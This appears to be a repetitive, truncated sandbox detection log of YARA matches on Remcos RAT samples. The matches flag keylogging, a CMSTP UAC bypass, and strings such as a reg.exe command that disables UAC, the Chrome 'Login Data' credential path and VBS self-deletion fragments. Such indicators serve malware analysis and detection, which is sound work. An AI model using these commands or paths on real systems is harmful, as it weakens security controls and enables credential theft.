24.2.yavascript.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
24.2.yavascript.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
24.2.yavascript.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
23.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
23.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
23.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.yavascript.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
23.2.yavascript.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
23.3.yavascript.exe.2500000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
23.3.yavascript.exe.2500000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
23.3.yavascript.exe.2500000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.3.yavascript.exe.2500000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
23.3.yavascript.exe.2500000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
23.3.yavascript.exe.2500000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
24.3.yavascript.exe.2590000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.3.yavascript.exe.2590000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
23.3.yavascript.exe.2500000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
23.3.yavascript.exe.2500000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
23.3.yavascript.exe.2500000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.3.yavascript.exe.2500000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
23.3.yavascript.exe.2500000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
35.3.yavascript.exe.2560000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
35.3.yavascript.exe.2560000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
35.3.yavascript.exe.2560000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.3.2iH7rqx9rQ.exe.24f0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.3.2iH7rqx9rQ.exe.24f0000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.3.2iH7rqx9rQ.exe.24f0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.3.2iH7rqx9rQ.exe.24f0000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
0.3.2iH7rqx9rQ.exe.24f0000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
0.3.2iH7rqx9rQ.exe.24f0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
35.2.yavascript.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
35.2.yavascript.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
35.2.yavascript.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
35.2.yavascript.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
24.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.yavascript.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
24.2.yavascript.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
24.2.yavascript.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
24.3.yavascript.exe.2590000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
35.3.yavascript.exe.2560000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
35.3.yavascript.exe.2560000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
35.3.yavascript.exe.2560000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
35.3.yavascript.exe.2560000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
23.2.yavascript.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
35.3.yavascript.exe.2560000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
0.2.2iH7rqx9rQ.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.2.2iH7rqx9rQ.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
24.2.yavascript.exe.2510e67.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
24.3.yavascript.exe.2590000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
23.2.yavascript.exe.ae0e67.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.3.yavascript.exe.2590000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
35.2.yavascript.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
35.2.yavascript.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
24.2.yavascript.exe.2510e67.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.yavascript.exe.2510e67.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.yavascript.exe.ae0e67.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.yavascript.exe.2510e67.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
35.3.yavascript.exe.2560000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
35.3.yavascript.exe.2560000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
0.2.2iH7rqx9rQ.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.2iH7rqx9rQ.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
23.2.yavascript.exe.ae0e67.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.yavascript.exe.ae0e67.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
24.2.yavascript.exe.2510e67.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
24.2.yavascript.exe.2510e67.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
23.3.yavascript.exe.2500000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
24.3.yavascript.exe.2590000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
0.2.2iH7rqx9rQ.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 